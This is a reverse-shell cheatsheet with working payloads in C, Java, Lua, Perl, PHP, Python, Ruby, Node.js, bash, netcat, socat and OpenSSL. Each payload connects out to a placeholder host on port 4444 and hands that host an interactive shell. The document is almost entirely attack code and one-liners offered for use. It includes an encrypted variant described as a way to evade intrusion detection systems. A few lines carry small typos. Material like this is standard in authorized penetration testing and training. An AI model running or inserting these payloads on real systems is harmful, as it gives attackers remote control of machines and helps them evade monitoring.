UNIX Reverse Shells Cheatsheet

Table of contents


Reverse shells

C

#include <stdio.h>
#include <unistd.h>
#include <arpa/inet.h>

#define REV_IP    "127.0.0.1"
#define REV_PORT  4444

int main(int argc, char *argv[]) {
    struct sockaddr_in sa;
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = inet_addr(REV_IP);
    sa.sin_port = htons(REV_PORT);
    int s = socket(AF_INET, SOCK_STREAM, 0);
    connect(s, (struct sockaddr *)&sa, sizeof(sa));
    dup2(s, 0);
    dup2(s, 1);
    dup2(s, 2);
    execve("/bin/sh", 0, 0);
    return 0;
}

Oneliner in shell to create and compile C reverse shell :

IP="127.0.0.1"; PORT=4444; printf "#include <stdio.h>\n#include <unistd.h>\n#include <arpa/inet.h>\n\nint main(int argc, char *argv[]){\n\tstruct sockaddr_in sa;\n\tsa.sin_family=AF_INET;\n\tsa.sin_addr.s_addr=inet_addr(\"$IP\");\n\tsa.sin_port=htons($PORT);\n\tint s = socket(AF_INET,SOCK_STREAM,0);\n\tconnect(s,(struct sockaddr *)&sa,sizeof(sa));\n\tdup2(s,0);\n\tdup2(s,1);\n\tdup2(s,2);\n\texecve(\"/bin/sh\",0,0);\n\treturn 0;\n}\n" > rev.c && gcc -Wall rev.c -o rev

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/1.2.3.4/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Lua

In a Lua script :

require('socket');
require('os');
t = socket.tcp();
t:connect('1.2.3.4','4444');
os.execute('/bin/sh -i <&3 >&3 2>&3');

Oneliner from a shell :

lua -e "require('socket');require('os');t=socket.tcp();t:connect('1.2.3.4','4444');os.execute('/bin/sh -i <&3 >&3 2>&3');"

Netcat

Netcat.traditional

nc -e /bin/sh 1.2.3.4 4444

New netcat

mkfifo /tmp/p;nc 1.2.3.4 4444 0</tmp/p|/bin/sh -i 2>&1|tee /tmp/p

Node.js

require('child_process').exec('bash -i >& /dev/tcp/1.2.3.4/4444 0>&1');

OpenSSL

Encrypted reverse shell

An Encrypted reverse shell can help avoid automatic detection by network security monitoring tools (such as Intrusion Detection Systems (IDS)). To create one, you need to generate an SSL certificate and start an SSL listener on your attacking machine, then run the reverse shell payload on the target machine.

  1. Generate SSL certificate:
openssl req -x509 -quiet -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
  1. Start an SSL listener on your attacking machine using openssl:
openssl s_server -quiet -key key.pem -cert cert.pem -port 4444
  1. Run the payload on target machine using openssl:

Short payload :

mkfifo /tmp/s;/bin/sh -i</tmp/s 2>&1|openssl s_client -quiet -connect 1.2.3.4:4444>/tmp/s 2>/dev/null;rm /tmp/s

Detailled payload :

mkfifo /tmp/pipesocket
/bin/sh -i < /tmp/pipesocket 2>&1 \
    | openssl s_client -quiet -connect 1.2.3.4:4444 > /tmp/pipesocket 2>/dev/null
rm/tmp/pipesocket

Perl

use Socket
$ip = "1.2.3.4";
$port = 4444;
socket(S, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
if(connect(S, sockaddr_in($port, inet_aton($ip)))){
    open(STDIN,">&S");
    open(STDOUT,">&S");
    open(STDERR,">&S");
    exec("/bin/sh -i");
};

Oneliner from a shell :

perl -e 'use Socket;$i="1.2.3.4";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

PHP

In a PHP file :

$sock = fsockopen("1.2.3.4",4444);
exec("/bin/sh -i <&3 >&3 2>&3");

Oneliner from a shell :

php -r '$sock=fsockopen("1.2.3.4",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Python

Using subprocess module

import socket, subprocess, os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("1.2.3.4",4444))

os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)

p = subprocess.call(["/bin/sh","-i"])

Oneliner from a shell :

python2 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.2.3.4",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Using pty module

import pty, socket, os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("1.2.3.4", 4444));

os.dup2(s.fileno(), 0);
os.dup2(s.fileno(), 1);
os.dup2(s.fileno(), 2);

pty.spawn("/bin/sh")

Oneliner from a shell :

python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.2.3.4",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Ruby

f = TCPSocket.open("1.2.3.4",4444).to_i;
exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Oneliner from a shell :

ruby -rsocket -e 'f=TCPSocket.open("1.2.3.4",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Shell

Shell with /dev/tcp

bash -i >& /dev/tcp/1.2.3.4/4444 0>&1

Shell with pipes and netcat

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1.2.3.4 4444 >/tmp/f

Socat

socat tcp:1.2.3.4:4444 exec:'bash -i',pty,stderr,setsid,sigint,sane &